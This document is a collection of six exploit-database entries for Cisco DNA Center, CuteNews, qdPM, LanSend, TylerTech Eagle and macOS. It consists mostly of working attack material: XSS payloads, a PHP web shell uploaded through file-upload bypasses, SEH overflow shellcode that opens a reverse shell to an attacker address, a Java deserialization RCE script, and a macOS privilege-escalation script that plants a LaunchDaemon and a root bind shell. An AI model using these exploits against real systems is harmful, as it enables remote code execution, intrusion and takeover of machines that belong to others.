# Exploit Title: Cisco Digital Network Architecture Center 1.3.1.4 - Persistent Cross-Site Scripting # Date: 2020-04-16 # Exploit Author: Dylan Garnaud & Benoit Malaboeuf - Pentesters from Orange Cyberdefense France # Vendor Homepage: https://www.cisco.com/c/en/us/products/cloud-systems-management/dna-center/index.html # Version: Cisco DNA before 1.3.0.6 and 1.3.1.4 # Tested on: 1.3.0.2 # CVE : CVE-2019-15253 # Security advisory: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190205-dnac-xss ## 1 - Network Hierarchy - Vulnerable parameter: Floor Name. - Payload: ```<script>alert('XSS')</script>``` - Details: There is no control or security mechanism on this field. Specials characters are not encoded or filtered. - Privileges: It requires admin or customer account. - Location: Design -> Network Hirearchy -> Building -> Floor -> Field: "Floor name" . ## 2 - User Management - Vulnerable parameters: First Name, Last Name . - Payload: ```<script>alert('XSS')</script>``` - Details: There is no control or security mechanism on this field. Specials characters are not encoded or filtered. - Privileges: It requires admin account. - Location: Settings -> Users -> User Management -> Fields: "First Name" or "Last Name".

# Exploit Title: CuteNews 2.1.2 - Authenticated Arbitrary File Upload # Date: 2020-05-12 # Author: Vigov5 - SunCSR Team # Vendor Homepage: https://cutephp.com # Software Link: https://cutephp.com/click.php?cutenews_latest # Version: v2.1.2 # Tested on: Ubuntu 18.04 / Kali Linux Description: ------------------------------------------------------------------------ In the "Media Manager" area, Users with low privileges (Editor) can bypass file upload restrictions, resulting in arbitrary command execution. [PoC] -------------------------------------------------------------------------------- # Step 1. Create shell $ exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' shell.png; # Step 2. Upload Shell (# Minimum editor privileges) POST /CuteNews/index.php HTTP/1.1 Host: [target] User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------15868731501112834542363527723 Content-Length: 3775 Origin: [target] DNT: 1 Connection: close Referer: [target]/CuteNews/index.php Cookie: CUTENEWS_SESSION=k4rgekaj68tr9ln8j0jlme7e7h Upgrade-Insecure-Requests: 1 -----------------------------15868731501112834542363527723 Content-Disposition: form-data; name="mod" media -----------------------------15868731501112834542363527723 Content-Disposition: form-data; name="opt" media -----------------------------15868731501112834542363527723 Content-Disposition: form-data; name="folder" -----------------------------15868731501112834542363527723 Content-Disposition: form-data; name="CKEditorFuncNum" -----------------------------15868731501112834542363527723 Content-Disposition: form-data; name="callback" -----------------------------15868731501112834542363527723 Content-Disposition: form-data; name="style" -----------------------------15868731501112834542363527723 Content-Disposition: form-data; name="faddm" -----------------------------15868731501112834542363527723 Content-Disposition: form-data; name="imgopts" -----------------------------15868731501112834542363527723 Content-Disposition: form-data; name="__signature_key" 7ffa4c94a150c20f0c1b51036f6e4597-editor -----------------------------15868731501112834542363527723 Content-Disposition: form-data; name="__signature_dsi" 48d87ded04d15407f258c57efa3216e8 -----------------------------15868731501112834542363527723 Content-Disposition: form-data; name="upload_from_inet" -----------------------------15868731501112834542363527723 Content-Disposition: form-data; name="upload_file[]"; filename="shell.png" Content-Type: image/png [Content Image Here ! ] -----------------------------15868731501112834542363527723 Content-Disposition: form-data; name="upload" Upload file(s) -----------------------------15868731501112834542363527723-- # Step 3. Change filename shell.jpg to shell.php POST /CuteNews/index.php HTTP/1.1 Host: [target] User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 241 Origin: [target] DNT: 1 Connection: close Referer: http://[target]CuteNews/index.php Cookie: CUTENEWS_SESSION=k4rgekaj68tr9ln8j0jlme7e7h Upgrade-Insecure-Requests: 1 mod=media&opt=media&folder=&CKEditorFuncNum=&callback=&style=&faddm=&imgopts=&__signature_key=ebdaf403dcda492fabe8f1d96399b16b-editor&__signature_dsi=27a9035f2b130dd1477ad2a37a5721da&pending=rename&ids%5B0%5D=shell.png&place%5B0%5D=shell.php # Step 4. Execute the command with the path : http:// [target]/CuteNews/uploads/shell.php?cmd=id

# Exploit Title: qdPM 9.1 - Arbitrary File Upload # Date: 2020-05-06 # Author: Besim ALTINOK # Vendor Homepage: https://sourceforge.net/projects/qdpm/ # Software Link: https://sourceforge.net/projects/qdpm/ # Version: v9.1 (Maybe it affect other versions) # Tested on: Xampp # Credit: İsmail BOZKURT # Remotely: Yes Description -------------------------------------------------------------------- When a normal user tries to update their profile, they can arbitrarily upload files to the user_photo area. Because there are no file extension controls. Additionally, the .htaccess file has some protection against malicious .php file. But, the developer writes the wrong regex. So, the Attacker can change extension as (.PHP) and run code on the server .htaccess file content: ---------------------------------------------- # This is used to restrict access to this folder to anything other # than images # Prevents any script files from being accessed from the images folder <FilesMatch "\.(php([0-9]|s)?|s?p?html|cgi|pl|exe)$"> Order Deny,Allow Deny from all </FilesMatch> Vulnerable File-1: actions.class.php ---------------------------------------------- Vulnerable function: processForm --------------------------------------------- Vulnerable area: --------------------------------------------- <?php protected function processForm(sfWebRequest $request, sfForm $form) { $files = $request->getFiles(); $userPhoto = $files['users']['photo']['name']; $form->bind($request->getParameter($form->getName()), $request->getFiles($form->getName())); if ($form->isValid()) { $user = $this->getUser()->getAttribute('user'); $this->checkUser($form['email']->getValue(),$user->getId()); $form->setFieldValue('users_group_id',$user->getUsersGroupId()); $form->setFieldValue('active',$user->getActive()); $hasher = new PasswordHash(11, false); if(isset($form['new_password'])) { if(strlen($form['new_password']->getValue())>0) { $form->setFieldValue('password', $hasher->HashPassword($form['new_password']->getValue())); } } if(strlen($userPhoto)>0) { $userPhoto = rand(111111,999999) . '-' . $userPhoto; $filename = sfConfig::get('sf_upload_dir') . '/users/' . $userPhoto; move_uploaded_file($files['users']['photo']['tmp_name'], $filename); $form->setFieldValue('photo', $userPhoto); app::image_resize($filename,$filename); } else { $form->setFieldValue('photo', $form['photo_preview']->getValue()); } ?>

# Exploit Title: LanSend 3.2 - Buffer Overflow (SEH) # Exploit Author: gurbanli # Date: 2020-05-12 # Vulnerable Software: LanSend 3.2 # Vendor Homepage: https://lizardsystems.com # Version: 3.2 # Software Link: https://lizardsystems.com/download/lansend_setup.exe # Tested on: Windows 7 x86 f = file('payload.txt','w') """ PoC 1. Run exploit 2. Run Lansend and Click Add Computers Wizard 3. Choose import computers from file 4. Copy/paste payload.txt content into filename section 5. shellcode will be executed """ """ msfvenom -p windows/shell_reverse_tcp lhost=172.16.74.128 lport=4444 EXITFUNC=thread -f py -v shellcode -e x86/shikata_ga_nai -b '\x00\x0a\x0d' """ shellcode = b"" shellcode += b"\xda\xd0\xd9\x74\x24\xf4\x58\xbe\xa4\x95\xaf" shellcode += b"\xc4\x2b\xc9\xb1\x52\x31\x70\x17\x03\x70\x17" shellcode += b"\x83\x4c\x69\x4d\x31\x70\x7a\x10\xba\x88\x7b" shellcode += b"\x75\x32\x6d\x4a\xb5\x20\xe6\xfd\x05\x22\xaa" shellcode += b"\xf1\xee\x66\x5e\x81\x83\xae\x51\x22\x29\x89" shellcode += b"\x5c\xb3\x02\xe9\xff\x37\x59\x3e\xdf\x06\x92" shellcode += b"\x33\x1e\x4e\xcf\xbe\x72\x07\x9b\x6d\x62\x2c" shellcode += b"\xd1\xad\x09\x7e\xf7\xb5\xee\x37\xf6\x94\xa1" shellcode += b"\x4c\xa1\x36\x40\x80\xd9\x7e\x5a\xc5\xe4\xc9" shellcode += b"\xd1\x3d\x92\xcb\x33\x0c\x5b\x67\x7a\xa0\xae" shellcode += b"\x79\xbb\x07\x51\x0c\xb5\x7b\xec\x17\x02\x01" shellcode += b"\x2a\x9d\x90\xa1\xb9\x05\x7c\x53\x6d\xd3\xf7" shellcode += b"\x5f\xda\x97\x5f\x7c\xdd\x74\xd4\x78\x56\x7b" shellcode += b"\x3a\x09\x2c\x58\x9e\x51\xf6\xc1\x87\x3f\x59" shellcode += b"\xfd\xd7\x9f\x06\x5b\x9c\x32\x52\xd6\xff\x5a" shellcode += b"\x97\xdb\xff\x9a\xbf\x6c\x8c\xa8\x60\xc7\x1a" shellcode += b"\x81\xe9\xc1\xdd\xe6\xc3\xb6\x71\x19\xec\xc6" shellcode += b"\x58\xde\xb8\x96\xf2\xf7\xc0\x7c\x02\xf7\x14" shellcode += b"\xd2\x52\x57\xc7\x93\x02\x17\xb7\x7b\x48\x98" shellcode += b"\xe8\x9c\x73\x72\x81\x37\x8e\x15\x02\xd7\xda" shellcode += b"\x65\x32\xda\xda\x74\x9f\x53\x3c\x1c\x0f\x32" shellcode += b"\x97\x89\xb6\x1f\x63\x2b\x36\x8a\x0e\x6b\xbc" shellcode += b"\x39\xef\x22\x35\x37\xe3\xd3\xb5\x02\x59\x75" shellcode += b"\xc9\xb8\xf5\x19\x58\x27\x05\x57\x41\xf0\x52" shellcode += b"\x30\xb7\x09\x36\xac\xee\xa3\x24\x2d\x76\x8b" shellcode += b"\xec\xea\x4b\x12\xed\x7f\xf7\x30\xfd\xb9\xf8" shellcode += b"\x7c\xa9\x15\xaf\x2a\x07\xd0\x19\x9d\xf1\x8a" shellcode += b"\xf6\x77\x95\x4b\x35\x48\xe3\x53\x10\x3e\x0b" shellcode += b"\xe5\xcd\x07\x34\xca\x99\x8f\x4d\x36\x3a\x6f" shellcode += b"\x84\xf2\x5a\x92\x0c\x0f\xf3\x0b\xc5\xb2\x9e" shellcode += b"\xab\x30\xf0\xa6\x2f\xb0\x89\x5c\x2f\xb1\x8c" shellcode += b"\x19\xf7\x2a\xfd\x32\x92\x4c\x52\x32\xb7" """ 047FFF09 59 POP ECX 047FFF0A 59 POP ECX 047FFF0B 80C1 64 ADD CL,64 047FFF0E ^FFE1 JMP ECX """ jmp_to_shellcode = '\x59\x59\x80\xc1\x64\xff\xe1' """ppr 00417a47""" payload = '\x90' * 30 + shellcode + jmp_to_shellcode + 'A' * 12 + '\xeb\xeb\x90\x90' + '\x47\x7a\x41' f.write(payload) f.close()

# Exploit Title: TylerTech Eagle 2018.3.11 - Remote Code Execution # Date: 2019-10-08 # Exploit Author: Anthony Cole # Vendor Homepage: https://www.tylertech.com/products/eagle # Version: 2018.3.11 # Tested on: Windows 2012 # CVE: CVE-2019-16112 # Category: webapps # # Eagle is a software written in Java by TylerTech. Version 2018.3.11 allows an unauthenticated attacker to cause the software to deserialize untrusted data that can result in remote code execution. # /recorder/ServiceManager in TylerTech Eagle 2018.3.11 is vulnerable to remote code execution via deserialization of untrusted user input from an authenticated user. The executed code will run as the tomcat service that is running the application. # import sys, requests, zlib, argparse, urlparse, subprocess from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) def run_command(command): p = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True) output = b'' for line in iter(p.stdout.readline, b''): output += line return output def isurl(urlstr): try: urlparse.urlparse(urlstr) return urlstr except: raise argparse.ArgumentTypeError("invalid url") if __name__ == "__main__": parser = argparse.ArgumentParser(description='Java Deserialization Exlpoit') parser.add_argument("--url", "-u", type=isurl, required=True, help="the url of the target.") parser.add_argument("--cmd", "-c", required=True, help="the command to execute") parser.add_argument("--ysoserial", "-y", required=True, help="the path to ysoserial.jar") parser.add_argument("--proxy", "-p", type=isurl, required=False, help="ex: http://127.0.0.1:8080") args = parser.parse_args() url_parts = urlparse.urlparse(args.url) target_url = "%s://%s" % (url_parts.scheme, url_parts.netloc) proxies = {} if(args.proxy != None): proxy_parts = urlparse.urlparse(args.proxy) proxies[proxy_parts.scheme] = "%s://%s" % (proxy_parts.scheme, proxy_parts.netloc) cmd = args.cmd serial_payload = run_command('java -jar %s CommonsCollections6 "%s"' % (args.ysoserial, args.cmd)) url = target_url + "/recorder/ServiceManager?service=tyler.empire.settings.SettingManager" headers = {'Content-Type': 'application/octet-stream'} payload = zlib.compress(serial_payload) response = requests.post(url, data=payload, proxies=proxies, verify=False)

# Exploit Title: MacOS 320.whatis Script - Privilege Escalation # Date: 2020-05-06 # Exploit Author: Csaba Fitzl # Vendor Homepage: https://support.apple.com/en-us/HT210722 # Version: macOS < 10.15.1 # Tested on: macOS # CVE : CVE-2019-8802 import sys import os man_file_content = """ .TH exploit 1 "August 16 2019" "Csaba Fitzl" .SH NAME exploit \- --> <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"><plist version="1.0"><dict><key>Label</key><string>com.sample.Load</string><key>ProgramArguments</key><array> <string>/Applications/Scripts/sample.sh</string></array><key>RunAtLoad</key><true/></dict></plist><!-- """ sh_quick_content = """ /Applications/Utilities/Terminal.app/Contents/MacOS/Terminal """ sh_reboot_content = """ python /Applications/Scripts/bind.py """ python_bind_content = """ #!/usr/bin/python2 import os import pty import socket lport = 31337 def main(): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(('', lport)) s.listen(1) (rem, addr) = s.accept() os.dup2(rem.fileno(),0) os.dup2(rem.fileno(),1) os.dup2(rem.fileno(),2) os.putenv("HISTFILE",'/dev/null') pty.spawn("/bin/bash") s.close() if __name__ == "__main__": main() """ def create_man_file(): print("[i] Creating bogus man page: /usr/local/share/man/man1/<!--exploit.1") f = open('/usr/local/share/man/man1/<!--exploit.1','w') f.write(man_file_content) f.close() def create_symlink(): print("[i] Creating symlink in /usr/local/share/man/") os.system('ln -s /Library/LaunchDaemons/com.sample.Load.plist /usr/local/share/man/whatis.tmp') def create_scripts_dir(): print("[i] Creating /Applications/Scripts directory") os.system('mkdir /Applications/Scripts') def create_quick_scripts(): create_scripts_dir() print("[i] Creating script file to be called by LaunchDaemon") f = open('/Applications/Scripts/sample.sh','w') f.write(sh_quick_content) f.close() os.system('chmod +x /Applications/Scripts/sample.sh') def create_reboot_scripts(): create_scripts_dir() print("[i] Creating script file to be called by LaunchDaemon") f = open('/Applications/Scripts/sample.sh','w') f.write(sh_reboot_content) f.close() os.system('chmod +x /Applications/Scripts/sample.sh') print("[i] Creating python script for bind shell") f = open('/Applications/Scripts/bind.py','w') f.write(python_bind_content) f.close() def rename_man_pages(): for root, dirs, files in os.walk("/usr/local/share/man"): for file in files: if file[0] in "0123456789": #if filename begins with a number old_file = os.path.join(root, file) new_file = os.path.join(root, 'a' + file) os.rename(old_file, new_file) #rename with adding a prefix print("[i] Renaming: " + os.path.join(root, file)) def main(): if len(sys.argv) != 2 : print "[-] Usage: python makewhatis_exploit.py [quick|reboot]" sys.exit (1) if sys.argv[1] == 'quick': create_man_file() create_symlink() create_quick_scripts() rename_man_pages() print "[+] Everything is set, run periodic tasks with:\nsudo periodic weekly\n[i] and then simulate a boot load with: \nsudo launchctl load com.sample.Load.plist" elif sys.argv[1] == 'reboot': create_man_file() create_symlink() create_reboot_scripts() rename_man_pages() print "[+] Everything is set, run periodic tasks with:\nsudo periodic weekly\n[i] reboot macOS or run `sudo launchctl load com.sample.Load.plist` and connect to your root shell via:\nnc 127.1 31337" else: print "[-] Invalid arguments" print "[-] Usage: python makewhatis_exploit.py [quick|reboot]" if __name__== "__main__": main()